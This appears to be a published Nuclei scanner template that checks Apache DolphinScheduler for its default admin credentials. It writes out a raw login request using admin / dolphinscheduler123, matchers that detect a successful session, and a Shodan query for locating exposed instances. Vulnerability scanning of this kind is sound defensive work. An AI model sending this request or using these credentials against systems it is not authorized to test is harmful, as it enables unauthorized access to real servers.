Apache DolphinScheduler Default Login

ID: dolphinscheduler-default-login

Severity: high

Author: For3stCo1d

Tags: apache,dolphinscheduler,default-login,oss

Description

Apache DolphinScheduler default admin credentials were discovered.

YAML Source

id: dolphinscheduler-default-login

info:
  name: Apache DolphinScheduler Default Login
  author: For3stCo1d
  severity: high
  description: Apache DolphinScheduler default admin credentials were discovered.
  reference:
    - https://github.com/apache/dolphinscheduler
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    shodan-query: http.title:"DolphinScheduler"
    product: dolphinscheduler
    vendor: apache
  tags: apache,dolphinscheduler,default-login,oss

http:
  - raw:
      - |
        POST /dolphinscheduler/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{user}}&userPassword={{pass}}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - dolphinscheduler123

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"msg":"login success"'
          - '"sessionId":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205773e0ec07c422f899b3490ba948e2ac2f32a52385b83cf047266737ead8980802205546e0ce9a1b87e700dfa98e3539932abe3f53f4afe7aecad632b33ec61a9a92:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/apache/dolphinscheduler-default-login.yaml"

View on Github